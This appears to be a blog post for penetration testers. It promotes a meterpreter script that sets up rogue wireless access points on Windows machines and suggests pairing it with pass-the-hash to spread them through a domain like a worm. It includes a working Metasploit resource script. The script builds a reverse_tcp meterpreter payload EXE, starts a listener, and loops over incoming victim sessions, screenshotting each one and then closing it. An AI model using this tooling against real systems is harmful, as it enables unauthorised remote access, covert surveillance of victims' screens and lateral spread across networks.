¡This post is aimed to pentester or any other curious people!
For penetration testers, this script means that they can now more easily
setup rogue wireless access points by utilizing this script, that
utilizes the soft ap feature that is implemented into Windows 7 and
Windows 2008.
If the victim computers are part of a Windows domain and have wireless NICs, by automating Metasploit with a pass-the-hash attack and using this script,
one could essentially automate deploying a series of rogue ap points
throughout a domain. This would be kind of like a network worm.
The meterpreter script assumes that you have AT LEAST Administrator privileges!, you need obtain this privileges before run script.
Example of use with metasploit console script! (Download it!)
| 2 | # Quick RC script to demonstrate the Ruby blocks in RC files
|
|---|---|
| 3 | #
|
| 4 | |
| 5 | #
|
| 6 | # Generate a corresponding EXE using msfpayload (change 192.168.0.228 to your IP):
|
| 7 | # $ msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.0.228 LPORT=4444 X > reverse.exe
|
| 8 | #
|
| 9 | |
| 10 | use exploit/multi/handler
|
| 11 | set PAYLOAD windows/meterpreter/reverse_tcp
|
| 12 | set LPORT 4444
|
| 13 | set LHOST 192.168.0.228
|
| 14 | set ExitOnSession false
|
| 15 | |
| 16 | exploit -j
|
| 17 | |
| 18 | # The first sleep below is not necessary, but makes the output cleaner
|
| 19 | <ruby>
|
| 20 | sleep(1)
|
| 21 | |
| 22 | print_status("Waiting on an incoming sessions...")
|
| 23 | while (true)
|
| 24 | framework.sessions.each_pair do |sid,s|
|
| 25 | thost = s.tunnel_peer.split(":")[0]
|
| 26 | |
| 27 | # Ensure that stdapi has been loaded before running
|
| 28 | if s.ext.aliases['stdapi']
|
| 29 | print_status("Screenshotting session #{sid} #{thost}...")
|
| 30 | s.console.run_single("screenshot -p #{thost}_#{sid}.jpg -v false -q 85")
|
| 31 | print_status("Closing session #{sid} #{thost}...")
|
| 32 | s.kill
|
| 33 | else
|
| 34 | print_status("Session #{sid} #{thost} active, but not yet configured")
|
| 35 | end
|
| 36 | |
| 37 | end
|
| 38 | sleep(1)
|
| 39 | end
|
| 40 | |
| 41 | print_status("All done")
|
| 42 | </ruby>
|
| 43 | |
| 44 | # Kill all open sessions
|
| 45 | sessions -K
|
| 46 | |
| 47 | # Exit the console (optional)
|
| 48 | exit
|
Donwload rogue ap script.
0 comentarios:
Publicar un comentario